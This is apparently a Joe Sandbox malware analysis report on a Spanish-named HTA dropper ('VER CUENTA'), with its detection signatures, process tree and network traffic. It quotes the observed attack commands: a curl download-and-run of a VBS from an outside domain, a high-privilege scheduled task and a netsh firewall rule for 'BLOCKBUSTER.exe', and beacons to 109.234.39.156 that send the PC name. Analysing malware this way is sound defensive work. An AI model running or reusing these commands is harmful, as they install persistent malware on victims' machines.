Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta

Overview

General Information

Sample name:#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta
renamed because original name is a hash value
Original sample name:VER CUENTA_.hta
Analysis ID:1544419
MD5:1f0b20b8e1b9c0267af0a33368e1d6c7
SHA1:4c0f0f757d4f84daaa301f8bf96648171eda3cdb
SHA256:2a1bb69cee435a0cd61bc70387717fce0109108ec1d2e8cf79304a01a602a527
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Modifies the windows firewall
Potential malicious VBS script found (has network functionality)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64_ra
  • mshta.exe (PID: 3860 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6988 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 6800 cmdline: curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • cmd.exe (PID: 4732 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 6300 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • BLOCKBUSTER.exe (PID: 6096 cmdline: "C:\_6720bdf2272bc\BLOCKBUSTER.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16)
          • schtasks.exe (PID: 5156 cmdline: SCHTASKS /Query /TN "BLOCKBUSTER" MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1288 cmdline: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6268 cmdline: SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00 MD5: 48C2FE20575769DE916F48EF0676A965)
          • cmd.exe (PID: 6172 cmdline: "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 6252 cmdline: netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 428 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 6564 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • mshta.exe (PID: 6676 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6720 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 6728 cmdline: curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • cmd.exe (PID: 3988 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 6288 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
    • cmd.exe (PID: 6544 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 6972 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
SourceRuleDescriptionAuthorStrings
0000001D.00000000.1560866719.0000000000401000.00000020.00000001.01000000.00000010.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, CommandLine: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\_6720bdf2272bc\BLOCKBUSTER.exe" , ParentImage: C:\_6720bdf2272bc\BLOCKBUSTER.exe, ParentProcessId: 6096, ParentProcessName: BLOCKBUSTER.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, ProcessId: 1288, ProcessName: cmd.exe
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, CommandLine: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\_6720bdf2272bc\BLOCKBUSTER.exe" , ParentImage: C:\_6720bdf2272bc\BLOCKBUSTER.exe, ParentProcessId: 6096, ParentProcessName: BLOCKBUSTER.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, ProcessId: 1288, ProcessName: cmd.exe
    Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 3860, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\6720bdf2273ae[1].vbs
    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 109.234.39.156, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6300, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49709
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4732, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , ProcessId: 6300, ProcessName: wscript.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3860, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs, ProcessId: 6988, ProcessName: cmd.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4732, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , ProcessId: 6300, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 109.234.39.156, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6300, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49709
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3860, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs, ProcessId: 6988, ProcessName: cmd.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4732, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" , ProcessId: 6300, ProcessName: wscript.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results
    Source: unknownHTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49714 version: TLS 1.2

    Networking

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 109.234.39.156 80
    Source: C:\Windows\SysWOW64\curl.exeDropped file: adodbStream.Write xmlhttp.ResponseBodyJump to dropped file
    Source: C:\Windows\SysWOW64\curl.exeDropped file: adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2 Jump to dropped file
    Source: global trafficHTTP traffic detected: GET /mod-mx282/mx2810.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /mx/mx2810.php?nomepc=user-PC HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 10:57:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 25 Oct 2024 12:51:08 GMTETag: "2600dc2-6254c92a08700"Accept-Ranges: bytesContent-Length: 39849410Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 50 4b 03 04 14 00 00 00 08 00 1c 4e 59 59 c9 28 78 92 a7 5e 06 02 00 80 90 04 08 00 00 00 37 7a 78 61 2e 64 6c 6c cc 3b 6b 6c 5b e7 75 87 97 14 5f a2 64 52 92 13 d7 b1 67 c5 96 5d d9 92 95 d8 92 3d 25 51 5d d2 a2 64 2b d1 83 b6 a8 c7 5a 03 36 2d 5e 49 9c 28 92 bb bc b4 e5 21 5d 3c 34 05 d2 c2 d8 8c c6 09 d2 56 49 bc 4c 49 83 24 1d bc 4d 43 85 2d 18 fc 23 0b 8c 40 45 3d cc 03 f2 c3 40 bd 41 18 e2 20 18 bc d6 6b dc ce 19 77 ce f7 7d f7 45 52 0f 5a 29 b0 0b 48 e7 de f3 9d f7 f7 fe ce c7 be 6f 44 40 02 00 07 6c 80 7c 1e 60 01 f8 13 84 cd b0 ea 63 03 f8 7b 3f 54 6f 9b f7 fc ec d1 05 5b ef cf 1e bd 78 31 3a 99 c8 d6 67 94 f4 84 12 9b ae 9f ce 65 d5 fa d3 72 bd 92 4b d5 e7 52 71 59 a9 1f 49 a4 5a f7 57 79 1b 7e 1f fe 9f 3c 91 2e 80 5e 9b 17 16 5e 7c 64 42 c3 dd 02 e9 d1 4a 9b f4 15 f8 de 5b 76 f8 e5 6d 86 bb 33 87 ef 7e 7c b9 f2 96 9d a2 c3 de 31 70 4e 56 6a 40 b8 f2 aa 03 83 c9 1e 09 82 36 43 93 9f f3 80 00 97 17 ec 8b 54 7a eb a7 f6 b9 d7 11 9e ff 17 3b ec f9 08 8a 9e ab 0b f6 1b 7f bb 19 ca 7d 36 dd fb a9 dd ff 10 c9 5d b0 ff b0 a6 b8 bc 45 95 67 54 84 1f ff fb 9b dc af 25 84 0e 2b 4d 3d c0 a9 96 04 27 dc f2 26 61 d0 f7 b7 10 7c f2 a6 bd 88 2e 1e 53 63 f8 fe c2 37 1d 3c 46 27 10 fe d9 5b 16 3a 8c da d5 96 d3 d9 2c bd 2f 5d f5 61 20 de b5 43 e9 e7 6a 4b 82 0b 9c 7b 9d c7 08 2e 23 fc f4 9d 62 79 71 4e f8 c3 1a ee 2b d4 21 fc de bb c5 74 32 97 b7 68 e3 b1 67 8d fe b5 22 ba 60 8b c2 e9 ba 08 71 45 d0 5d 2e 45 27 27 d3 63 00 ac 6e b0 8e 60 1e e1 1b 45 74 87 5b 94 ac 32 46 1f 7b 3e 32 ea 78 f8 c3 22 79 ec c5 dc 86 e8 39 7f d1 b1 22 dd 97 f0 38 fc 41 b0 bb 0e a7 d3 49 39 96 62 ad 95 fd 43 6c 45 77 2c 99 95 1d 51 25 27 3b 07 cf 65 55 79 9a 42 d1 86 25 92 3b 94 ca 26 3a 27 63 0a a3 cd b3 a6 4e 7d 09 cb 3c 0e c2 33 f7 f2 79 81 9f 44 bc cd 3d 38 99 56 d4 9e 94 0a e7 f3 f9 fc 73 1a cf f3 bc 6c 3a 96 4c 62 99 a4 15 b2 b2 cb 54 e6 42 b4 3c 21 2b 14 09 56 28 c1 02 e1 1d 87 cf a9 b2 55 ff 75 86 1f 49 2b 71 ab fe 4f 98 8e ce 98 12 4f a4 62 c9 0a 5e 96 cf b3 32 47 20 08 75 ae 48 3a 81 5a 14 e0 92 36 21 ce 5f 81 7a 0f b6 11 46 28 ce 73 e5 f8 b4 53 b9 73 c8 4c 00 54 aa 09 1d c5 72 9b a7 3f a6 26 ce c8 48 64 b2 1c 40 a5 32 2f 2f 23 09 66 6b 2e 62 99 c3 39 98 48 4d 24 65 b2 e3 32 7d bb bb 66 54 19 c7 ce b8 c4 74 cf 33 9a 70 3a 77 3a 29 db 10 f3 01 7d 3b 3a d3 d3 19 3b 2b bf c1 78 3a 73 8a 22 a7 c6 ce 39 b8 ff 88 ab a8 64 f1 1f 54 15 14 8f ca ee 93 df 9e 88 56 91 8f 53 b5 12 6d 5d 0d c3 8f 24 e2 32 e1 7b 35 7c 33 e2 ed 6e 8a 39 b5 15 2d 26 cf 35 d6 2c d3 50 4e 30 7a aa 0b a2 97 34 fa d1 e5 e8 2f 30 fa de 74 6a 82 e8 f5 90 bd b0 1c fd fb 58 50 e3 cc 32 77 48 fa 22 7e 57 7a c9 ec 41 1d 77 0b 71 5e 2f b9 c8 71 54 b9 77 11 e7 73 0d c7 94 44 8c 9a 1b 38 6a f1 db 3b 90 94 0d 1
    Source: global trafficHTTP traffic detected: GET /mod-mx282/mx2810.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /mx/mx2810.php?nomepc=user-PC HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: acess.mailcffemx.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownHTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49714 version: TLS 1.2

    System Summary

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
    Source: classification engineClassification label: mal96.evad.winHTA@51/13@1/27
    Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\6720bdf227263[1].js
